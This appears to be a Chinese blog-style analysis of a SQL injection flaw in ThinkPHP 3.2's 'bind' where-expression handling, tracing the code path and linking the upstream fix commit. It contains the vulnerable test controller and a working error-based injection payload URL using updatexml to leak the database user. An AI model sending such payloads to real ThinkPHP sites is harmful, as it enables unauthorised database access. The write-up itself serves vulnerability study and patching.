漏洞代码:
public function test01()
{
$User = M("user");
$user['id'] = I('id');
$data['password'] = I('password');
$value = $User->where($user)->save($data);
var_dump($value);
}
payload:http://tp32.com/index.php/home/index/test01?id[0]=bind&id[1]=0%20and%20(updatexml(1,concat(0x7e,user(),0x7e),1))&pwd=bbb
漏洞分析:
老样子先进入where方法中进行参数构造
然后进入 save 方法中 _parseOptions 进行字段验证
然后重点 出来了之后 进入到 update 方法中
先是进行参数绑定
然后进行 parseWhere
再进入 parseWhereItem where子单元分析
其中到来 bind表达式的处理分支,拼接=:
此时的语句为如下
出来之后 继续进入到 execute 方法中,重点来了
虽然上面bind表达式进行了拼接=:,但是这个strtr函数会进行处理,最后语句成为如下
修复:
https://github.com/top-think/thinkphp/commit/7e47e34af72996497c90c20bcfa3b2e1cedd7fa4
参考文章:https://y4er.com/post/thinkphp3-vuln/
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。